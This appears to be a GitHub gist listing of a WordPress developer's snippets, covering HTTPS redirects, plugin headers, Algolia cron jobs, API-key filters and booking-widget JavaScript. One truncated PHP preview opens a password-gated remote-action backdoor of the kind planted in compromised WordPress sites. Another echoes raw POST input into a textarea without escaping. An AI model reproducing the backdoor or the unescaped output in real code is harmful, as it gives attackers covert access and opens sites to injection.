This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # BEGIN Force HTTPS | |
| RewriteCond %{HTTP:X-Forwarded-Proto} !=https | |
| RewriteCond %{HTTPS} !=on | |
| RewriteCond %{REQUEST_METHOD} !=POST | |
| RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] | |
| # END Force HTTPS |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Plugin Name: Time Smudge | |
| Plugin URI: https://www.philwylie.co.uk/ | |
| Description: Do you have a bunch of posts which share the same publish date & time? Do you find the order of your posts shifts around each time a query is run? This can happen after running a mass import of posts. Time Smudge spaces out the publish time randomly over the same/next day giving you a definite value for a buttery smooth, consistent sort order. | |
| Version: 1.0.0 | |
| Author: Phil Wylie | |
| Author URI: https://www.philwylie.co.uk/ | |
| License: GPL2 | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Plugin Name: Import terms | |
| Plugin URI: https://www.philwylie.co.uk/ | |
| Description: Given an array of terms, import into a specified taxonomy. Tool to help format array - https://link.from.pw/2tM8iEs | |
| Version: 1.0.0 | |
| Author: Phil Wylie | |
| Author URI: https://www.philwylie.co.uk/ | |
| License: GPL2 | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 18 * * 1-5 wp algolia reindex --all --path=/home/user/public_html | |
| 0 18 * * 1-5 wp algolia reindex searchable_posts --path=/home/user/public_html |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Google API key. | |
| */ | |
| function pw_google_api_key() { | |
| return 'KEY'; | |
| } | |
| add_filter( 'pw_google_api_key', 'pw_google_api_key' ); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** Google API key. */ | |
| define('PW_GOOGLE_API_KEY', 'KEY'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $cmb->add_field( array( | |
| 'name' => 'Location', | |
| 'desc' => 'Drag the marker to set the exact location', | |
| 'id' => $prefix . 'location', | |
| 'type' => 'pw_map', | |
| // 'split_values' => true, // Save latitude and longitude as two separate fields | |
| // 'api_key' => 'KEY', // Google API Key | |
| ) ); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div id="main-content" class="is_fullwidth home-template"> | |
| <div class="container"> | |
| <div class="row"> | |
| <div class="col-xs-12"> | |
| <form method="post"> | |
| <p> | |
| <textarea name="galleries" style="width: 500px; height:200px;"><?php echo ( isset( $_POST['galleries'] ) && ! empty( $_POST['galleries'] ) ) ? stripslashes( $_POST['galleries'] ) : ''; ?></textarea> | |
| </p> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2fbea44207801ca38544db1f0044226e')) | |
| { | |
| switch ($_REQUEST['action']) | |
| { | |
| case 'get_all_links'; | |
| foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) | |
| { | |
| $data['code'] = ''; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mews.Distributor({ | |
| configurationIds: $.map(iweb_mews_config, function (o) { | |
| return o["configurationid"]; | |
| }), | |
| hotelIds : ['1', '2'], // Hacky workaround to force Distributor into chain mode. | |
| }, function (distributor) { | |
| // Hook into booking links, optionally prepopulate a voucher code. | |
| $('.js-booking-link').on('click', function (e) { | |
| e.preventDefault(); |